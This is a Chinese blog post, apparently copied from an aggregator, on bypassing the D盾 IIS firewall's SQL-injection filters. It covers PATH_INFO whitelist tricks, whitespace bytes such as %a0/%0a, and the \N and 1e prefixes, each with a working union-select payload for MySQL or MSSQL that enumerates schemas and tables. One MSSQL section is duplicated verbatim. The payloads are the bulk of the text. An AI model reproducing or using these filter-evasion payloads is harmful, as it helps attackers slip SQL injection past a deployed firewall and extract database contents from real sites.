D盾IIS防火墙,目前只支持Win2003服务器

IIS+PHP+MYSQL

绕过姿势一:白名单

PHP中的PATH_INFO问题,简单来说呢,就是 http:/x.x.x.x/3.php?id=1 等价于 http://x.x.x.x/3.

php/xxxxxxxxxxxxx?id=1

从白名单中随便挑个地址加在后面,可成功bypass,http://10.9.10.206/3.php/admin.ph

p?id=1 union select 1,2,schema_name from information_schema.SCHEMATA 经测试,GET、POST、COOKIE均有效

绕过姿势二:空白字符

Mysql中可以利用的空白字符有:%09,%0a,%0b,%0c,%0d,%20,%a0; 测试了一下,基本上

针对MSSQL的[0x01-0x20]都被处理了,唯独在Mysql中还有一个%a0可以利用,可以看到%a0与select合体,无法识别,从而绕过。

id=1 union%a0select 1,2,3 from admin

绕过姿势三:\N形式

主要思考问题,如何绕过union select以及select from? 如果说上一个姿势是union和select之

间的位置的探索,那么是否可以考虑在union前面进行检测呢? 为此在参数与union的位置,经测试,发现\N可以绕过union select检测,同样方式绕过select from的检测。

id=\Nunion(select 1,schema_name,\Nfrom information_schema.schemata)

IIS+ASP/ASPX+MSSQL

绕过姿势一:白名单

ASPX:与PHP类似 /1.aspx/admin.php?id=1

union select 1,'2',TABLE_NAME from INFORMATION_SCHEMA.TABLES 可成功bypass

绕过姿势二:空白字符 Mssql可以利用的空白字符有:

01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20 [0x01-

0x20]全部都被处理了,想到mysql %a0的漏网之鱼是否可以利用一下? ASP+MSSQL: 不支持%a0, ASPX+MSSQL: %a0+%0a配合,可成功绕过union select的检测

id=1 union%a0%0aselect 1,'2',TABLE_NAME %a0from INFORMATION_SCHEMA.TABLES

绕过姿势二:空白字符

Mssql可以利用的空白字符有:

01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20 [0x01-

0x20]全部都被处理了,想到mysql %a0的漏网之鱼是否可以利用一下? ASP+MSSQL: 不支持%a0。

ASPX+MSSQL: %a0+%0a配合,可成功绕过union select的检测 id=1 union%a0%0aselect 1,'2',TABLE_NAME

绕过姿势三:1E形式

MSSQL属于强类型,这边的绕过是有限制,from前一位显示位为数字类型,这样才能用1efrom绕过select from。

只与数据库有关,与语言无关,故ASP与ASPX一样,可bypass,

id=1eunion select '1',TABLE_NAME,1efrom INFORMATION_SCHEMA.TABLES

bypass最新版d盾mysql_D盾_IIS防火墙SQL注入防御-WAF Bypass实战相关推荐

  1. bypass最新版d盾mysql_Bypass D盾_IIS防火墙SQL注入防御(多姿势)

    0X01 前言 D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况.D盾_IIS防火墙注入防御策略 ...

  2. bypass最新版d盾mysql_Bypass D盾_IIS防火墙SQL注入防御(多姿势) | CN-SEC 中文网

    0X01 前言 D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的 a.白名单   b.绕过union select或se ...

  3. bypass最新版d盾mysql_Bypass 护卫神SQL注入防御(多姿势)

    0x00 前言 ​ 护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能. 这边主要分享一下几种思路,Bypa ...

  4. Bypass 360主机卫士SQL注入防御(附tamper脚本)

    0x01 前言 在测试过程中,经常会遇到一些主机防护软件,对这方面做了一些尝试,可成功bypass了GET和POST的注入防御,分享一下姿势. 0x02 环境搭建 Windows Server 200 ...

  5. bypass最新版d盾mysql_D盾一句话动态代码执行拦截bypass

    一句话地址:http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp 密码:z 普通的菜刀是连接不上滴.代码如下: Function decode(ByVal s, ByV ...

  6. 海豚php框架漏洞,代码审计 - dolphin.pro cms SQL注入漏洞,Bypass过滤规则

    Dolphin是一个网络软件平台,你可以下载并使用它来建立你自己的利基社交网络.社区网站.在线俱乐部或基于兴趣的社交网站. 代码分析: 1./flash/modules/chat/inc/action ...

  7. 我的WAF Bypass实战系列

    ​ 梳理了一下自己写过的WAF Bypass相关的文章,按照编写时间顺序,整理成了一个WAF Bypass实战系列,如果你准备了解WAF攻防这一块的内容,可以来了解一下. 第一篇:<Bypass ...

  8. 阿里云盾技术强在哪里?轻松防御DDoS、CC攻击

    阿里云安全核心产品:云盾 云盾是阿里巴巴集团多年来安全技术研究积累的成果,结合阿里云云计算平台强大的数据分析能力,为中小网站提供如安全漏洞检测.网页木马检测,以及面向云服务器用户提供的主机入侵检测.防 ...

  9. [脚本编程] 过云盾、D盾各种盾shell

    作者: dean <?php//过云盾.D盾各种盾shell $id = $_GET['id']; //debug echo $catid = isset($_GET['catid'])?bas ...

  10. 深信服防火墙console波特率_乾颐盾之深信服防火墙------初始化教程

    乾颐盾之深信服防火墙 -----初始化教程 今天我们带来的是深信服防火墙,AF-1020的简单初始化和简单设置,让我们来简单的入门了解下深信服防火墙的相关使用方法. 一:利用console口接入防火墙 ...

最新文章

  1. webRTC开启摄像头
  2. L1-041 寻找250
  3. python中实现定时器Timer
  4. python读取大文件csv_实现读取csv文件,文件里面是有限个百分数成绩(99.6、76.8等等...
  5. java 返回js,Javascript返回上一页
  6. 京东集团副总裁王楠:数智化是打造国际消费中心城市的必由之路
  7. mysql主从复制-主库已有数据
  8. mysql 中的neq_标准中的Eqv、Idt和Neq分别代表什么 详细
  9. android 半透明背景
  10. 静默安装Oracle19c软件与数据库
  11. 线性代数学习笔记——第二十四讲——向量及其线性运算
  12. 抛硬币概率公式 计算机题,抛币概率公式及其求解实例
  13. 腾讯云数据库 CynosDB应用场景与产品优势有哪些?
  14. 弱网测试:使用netem模拟网络延迟、丢包、损坏、重复、和乱序等网络问题
  15. 叶辽 c语言,段子贴,不定期更新叶辽、黄源清、守墓人都负重伤,而魔王也并不...
  16. 机器学习算法(九): 基于线性判别LDA模型的分类(基于LDA手写数字分类实践)
  17. Android OAID 深度探究
  18. mysql在哪里安装_mysql安装路径在哪里
  19. 逻辑电路是现代数字电子计算机的基础,数字逻辑电路基础与计算机系统集成技术...
  20. ePSXe 1.7.0与DAEMON Tools Lite配合的问题

热门文章

  1. github拉取vue项目启动时出错问题npm ERR!
  2. 对CAM于grad-cam说得简单明了的一篇文章
  3. 400G技术市场前景和主流产品
  4. 【计算机视觉|生成对抗】用于高保真自然图像合成的大规模GAN训练用于高保真自然图像合成的大规模GAN训练(BigGAN)
  5. 产品设计体会(四一)——用户创意无限
  6. 【观影】2019年观影记录
  7. BPDU GUAR​D的功能
  8. 2022年全球市场利拉鲁肽总体规模、主要生产商、主要地区、产品和应用细分研究报告
  9. MATLAB元胞自动机算法学习之森林火灾代码演示
  10. 【LeetCode每日一题】【2021/12/15】851. 喧闹和富有